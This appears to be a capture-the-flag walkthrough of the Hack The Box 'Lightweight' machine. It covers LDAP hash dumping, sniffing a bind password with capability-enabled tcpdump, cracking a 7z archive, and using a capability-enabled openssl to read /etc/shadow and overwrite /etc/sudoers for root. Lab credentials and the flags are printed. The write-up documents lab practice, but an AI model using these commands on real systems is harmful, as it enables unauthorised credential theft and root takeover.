Linux Boxes

lightweight

  1. nmapAuto
    1. nmap vulns
  2. ldap
    1. ldapsearch with DC
      1. passwords
      2. $6$x module
  3. http
    1. info.php
    2. status.php
    3. user.php
  4. ssh
    1. /etc/passwd
    2. LinEnum
      1. report
  5. wireshark
    1. tcpdmp
    2. lightweight.ens33.cap
    3. refresh all the webpages and intercept LDAP packets
    4. privesc to ldapuser2
  6. privesc to ldapuser1
    1. 7z2John
    2. hashcat the 7z2john hash
    3. unzip 7z w/ pass
      1. status.php
    4. privesc
  7. privesc to root
    1. gtfo bins openssl
    2. testing openssl to view /etc/shadow
    3. privesc via sudoers config file
  8. user/root
  9. lessons learned

lightweight

images/1480-1.png
images/1480-2.png

nmapAuto

images/1481-1.png

images/1481-2.png

nmap vulns

images/1483-1.png

ldap

since the box is named lightweight and lightweight directory access protocol LDAP was found running on the box, lets enumerate that first...

ldapsearch -h 10.10.10.119 -x -s base namingcontexts
images/1513-1.png

with the domain name we can extrapolate more info with ldapsearch
images/1513-2.png

ldapsearch with DC

ldapsearch -h 10.10.10.119 -x -b "dc=lightweight, dc=htb"
images/1482-1.png


images/1482-2.png

passwords

all the passwords seem to be encoded in base64, lets decode them
put them in a hash files for hashcat

ldapuser1: e2NyeXB0fSQ2JDNxeDBTRDl4JFE5eTFseVFhRktweHFrR3FLQWpMT1dkMzNOd2Roai5sNE16Vjd2VG5ma0UvZy9aLzdONVpiZEVRV2Z1cDJsU2RBU0ltSHRRRmg2ek1vNDFaQS4vNDQv

{crypt}$6$3qx0SD9x$Q9y1lyQaFKpxqkGqKAjLOWd33Nwdhj.l4MzV7vTnfkE/g/Z/7N5ZbdEQWfup2lSdASImHtQFh6zMo41ZA./44/

ldapuser2:e2NyeXB0fSQ2JHhKeFBqVDBNJDFtOGtNMDBDSllDQWd6VDRxejhUUXd5R0ZRdmszYm9heW11QW1NWkNPZm0zT0E3T0t1bkxaWmxxeXRVcDJkdW41MDlPQkUyeHdYL1FFZmpkUlF6Z24x

{crypt}$6$xJxPjT0M$1m8kM00CJYCAgzT4qz8TQwyGFQvk3boaymuAmMZCOfm3OA7OKunLZZlqytUp2dun509OBE2xwX/QEfjdRQzgn1

$6$x module

module is 1800

images/1487-1.png

images/1487-2.png

images/1487-3.png

sha512 is a very complex cryptography and will take our machine 4 hours to run rockyou against it, so lets look for other avenues to gain our initial foothold in the meantime

http

images/1488-1.png

info.php

nothing too important here
images/1492-1.png

status.php

images/1491-1.png

user.php

images/1489-1.png


it seems our IP has automatically been added as a user to the box will let us ssh to the box! lets go log in
images/1489-2.png

ssh

password is the same as our IP
images/1490-1.png

we have a couple of new users of IP addresses at the bottom that most likely have password identical to their IPs, nothing too interesting here otherwise:
images/1490-2.png

/etc/passwd

lets check to see what other users are on the box since as we seen, user.php automatically adds any user that navigates to that URL

images/1493-1.png
images/1493-2.png

LinEnum

from here we can enumerate the box further with LinEnum since we have ssh access

images/1494-1.png

images/1494-2.png

images/1494-3.png

report

images/1495-1.png
images/1495-2.png

these extended permissions allow us to run tcpdump as root (which means we can capture some packets)

a quick google says this about POSIX
images/1495-3.png

wireshark

since we have the capabilities to capture packets on this machine using tcpdump, lets put it to use

we'll need to reference interface 'lo' for our tcpdump command from the networking segment from our linenum report,
images/1496-1.png

tcpdmp

lets run a live tcpdump in and pipe the packets through a live feed wireshark:

ssh 10.10.14.62@10.10.10.119 "/usr/sbin/tcpdump -i lo -U -s0 -w - 'not port 22'" | wireshark -k -i -
(stdin)
where
/usr/sbin/tcpdump is the binary we want to run through our ssh tunnel
-i for interface lo for loopback
-U for unbuffered packets
-s0 Sets the snaplen to 0 which allows tcpdump to work with older versions of tcpdump
-w for file and Standard output is used with ‘-
‘not port 22’ filters out ssh packets

then we pipe the dump to wireshark
where
-k starts the capture immeditately
-i to capture all interfaces -

images/1497-1.png

lightweight.ens33.cap

we're trying to find the traffic in which the server creates new accounts for new users in ldap and see exactly what's going on there

wireshark starts empty at first but refreshing user.php..
images/1498-1.png

but pinging the localhost on the box
images/1498-2.png

images/1498-3.png
shows packets getting captured! Next step is to see what refreshing the other webpages do

refresh all the webpages and intercept LDAP packets

after refreshing all the webpages
(info.php, user.php, status.php and home.php)

status.php generates these packets to sift through:
images/1499-1.png


looking at the bindRequest packet we see an authentication request from ldapuser1!
with credentials: 8bc8251332abe1d7f105d3e53ad39ac2
images/1499-2.png
images/1499-3.png

images/1499-4.png:images/1499-5.png

privesc to ldapuser2

lets see if we can take these creds to elevate our privileges on the box
(ssh does NOT work but su DOES)

pw:8bc8251332abe1d7f105d3e53ad39ac2
images/1500-1.png

privesc to ldapuser1

checking out the contents of ldapuser2's home directory we see we have our user.txt flag as well as a peculular 7zip file, lets unzip it on our attack machine

images/1484-1.png

7za is a built in binary that can compress and decompress 7zip files
where x extracts the file contents
images/1484-2.png

the file is password protected, luckily we have john to help us bruteforce creds

7z2John

if you do not have jumbojohn which contains 7z2john you can git clone it from here
images/1503-1.png


./7z2john <file>
images/1503-2.png

copy the entire hashstring up to the colon and put it in a hash file

hashcat the 7z2john hash

images/1504-1.png

images/1504-2.png

images/1504-3.png

password to extract files from the 7z is delete

unzip 7z w/ pass

7z e backup.7z
with password: delete
images/1505-1.png

status.php

looking at the php here we see there are credentials to ldapuser1 in plaintext

f3ca9d298a553da117442deeb6fa932d
images/1506-1.png

privesc

using the credentials for ldapuser1 exposed in the status.php file, we elevate our privileges!
pw: f3ca9d298a553da117442deeb6fa932d

images/1507-1.png

privesc to root

running
getcap *
images/1508-1.png

empty capabilities or 'ep' (effective permission)
if you have a blank/empty cap, you have ALL permissions, (not none)


looking at the capabilities man page:
images/1508-2.png


gtfo bins openssl

images/1509-1.png



and sudo:

images/1509-2.png

testing openssl to view /etc/shadow

running openssl without an absolute path runs it from our /usr/bin directory, which is NOT the openssl with ef capabilities

images/1510-1.png

however if we run the openssl binary located within our /home/ldapuser1 directory...
/home/ldapuser1/openssl enc -in /etc/shadow
images/1510-2.png
images/1510-3.png

privesc via sudoers config file

images/1511-1.png
so first we update our sudoers file we copied to ldapuser1's home directory, give him permission to use any and all commands and then sudo - to root from there

first print out the contents of our /etc/sudoers file
./openssl enc -in /etc/sudoers
images/1511-2.png
and copy it to a file in our ldapuser1 directory:
images/1511-3.png

images/1511-4.png

vi /etc/sudoers - we want to add the same permissions root has to ldapuser1
images/1511-5.png
which looks like this:
images/1511-6.png

now cat our copied sudoers file and have our privileged openssl binary overwrite it to /etc/sudoers
cat ./sudoers | ./openssl enc -out /etc/sudoers
images/1511-7.png

now simply elevate to root with ldaps' newly configured permissions and..
Note: you may need to exit out of ldapuser1's session before the changes to the sudoer file take effect!
images/1511-8.png

sudo su -
we're root!
images/1511-9.png

user/root

images/1485-1.png
8a866d3bb7e13a57aaeb110297f48026


images/1485-2.png
f1d4e309c5a6b3fffff74a8f4b2135fa

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/

images/1501-1.png